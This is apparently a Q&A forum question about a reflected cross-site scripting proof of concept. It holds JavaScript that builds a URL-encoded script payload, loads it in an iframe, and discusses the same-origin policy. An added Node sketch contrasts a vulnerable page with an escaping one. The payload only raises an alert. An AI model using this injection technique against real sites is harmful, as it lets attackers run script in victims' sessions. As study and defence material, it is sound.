
I'm trying to implement a simple XSS attack for a (non-malicious) proof of concept and am having some issues. The goal is to populate a form and submit it within an iframe.

function grab() {
    alert('yess');
}

// Build the reflected-XSS link: the payload is the source of grab() plus a call
// to it, wrapped in a script element. The closing tag is written as "</script" + ">"
// so the literal "</script>" never appears inside this page's own script block,
// where the HTML parser would otherwise end the block early.
function makeLink() { 
    return "http://mysite.com/?" + encodeURIComponent("<script" + ">" + grab.toString() +
    ";grab();</script" + ">"); 
    // returns "http://mysite.com/?%3Cscript%3Efunction%20grab()%20%7B%0A%20%20%20%20alert('yess')%3B%0A%7D%3Bgrab()%3B%3C%2Fscript%3E"
}

var iframe = document.createElement('iframe');
// makeLink() takes no parameters. The snippet as posted passed three identifiers
// (xssdefense, target, attacker) that are never declared here; if they do not
// exist in the real file, that line throws a ReferenceError before the frame is
// appended.
iframe.src = makeLink();
iframe.height = 600;
iframe.width = 800;
// not sure if I need this line, but un-commenting doesn't seem to change anything. 
// iframe.sandbox = "allow-scripts allow-same-origin allow-forms"
document.body.appendChild(iframe);

Ideally, when this HTML file is opened, an iframe with the JavaScript injected will be sitting there. Upon console investigation, grab() is defined and callable in the main window, but not in the frame, which puzzles me.

Anyway, any help is appreciated. Thanks a bunch!

xavdid
  • That's because of CORS, or cross-origin resource sharing: you can't access the main window from the iframe because of the same-origin policy. – Ohgodwhy Oct 10 '13 at 05:45
  • Maybe I'm reversing it in my head, but since the JavaScript is injected and run in the iframe, shouldn't the JavaScript be accessible within it? When I say I ran it from the Chrome console, I mean that I shifted context into the frame, ignoring the top-level window. – xavdid Oct 10 '13 at 05:49
  • You maybe made it there, but you're using `mysite.com`, which isn't the same as the origin that opened the window, `yoursite.com`. – Ohgodwhy Oct 10 '13 at 05:50
  • Assuming `mysite.com` didn't have any protections against XSS, wouldn't that be the point of the attack? To execute JS from somewhere you shouldn't be able to? – xavdid Oct 10 '13 at 05:54
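A Node-runnable sketch of what the link built by makeLink() has to meet on the receiving side, added here as an example; it is not code from the question or from mysite.com. It assumes, hypothetically, that mysite.com copies the raw query string into its HTML without escaping (the "no protections against XSS" case raised in the comments) and puts a hardened variant of the same page beside it; the names reflectedInput, renderVulnerable, renderHardened and containsLiveScript are made up for the example. The browser half cannot be reproduced in Node, but follows from the same precondition: a script that mysite.com reflects runs in the iframe's own window, so grab becomes defined in the frame only if the reflection actually happens, while the grab declared by the attacker page's script lives in the top window regardless, because each window has its own global object.

```javascript
// Added example: a Node simulation of the reflected-XSS proof of concept from
// the question. The two renderers below are hypothetical stand-ins for the
// target page; they are not code from mysite.com.

function grab() {
  alert('yess');
}

// Same construction as the question: the closing tag is split as "</script" + ">"
// so the literal "</script>" never appears inside the attacker page's own script
// element, where the HTML parser would end that element early.
function makeLink() {
  var payload = '<script' + '>' + grab.toString() + ';grab();</script' + '>';
  return 'http://mysite.com/?' + encodeURIComponent(payload);
}

// What a reflecting server sees: the query string after "?", URL-decoded.
// The link carries no "name=" prefix, so the whole query is the payload.
function reflectedInput(link) {
  var query = new URL(link).search.slice(1); // drop the leading "?"
  return decodeURIComponent(query);
}

// Hypothetical vulnerable page: raw interpolation of the query into the body.
function renderVulnerable(link) {
  return '<html><body><p>You searched for: ' + reflectedInput(link) +
         '</p></body></html>';
}

// Output encoding for an HTML text context.
function escapeHtml(s) {
  return s.replace(/&/g, '&amp;')
          .replace(/</g, '&lt;')
          .replace(/>/g, '&gt;')
          .replace(/"/g, '&quot;')
          .replace(/'/g, '&#39;');
}

// Hypothetical hardened page: same template, reflected input encoded first.
function renderHardened(link) {
  return '<html><body><p>You searched for: ' + escapeHtml(reflectedInput(link)) +
         '</p></body></html>';
}

// True when the rendered page contains a script element that calls grab(),
// i.e. when a browser loading this page would run the payload in the page's
// own origin (mysite.com, not the page that framed it).
function containsLiveScript(html) {
  return /<script>[\s\S]*grab\(\);<\/script>/.test(html);
}

function demo() {
  var link = makeLink();
  console.log('link:', link);
  console.log('vulnerable page runs payload:', containsLiveScript(renderVulnerable(link)));
  console.log('hardened page runs payload:  ', containsLiveScript(renderHardened(link)));
}

demo();
```

Run with `node` and compare the two last lines: the payload is live only when the target echoes the query unencoded, which is the property the iframe experiment depends on and the one the snippet in the question cannot supply on its own.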

0 Answers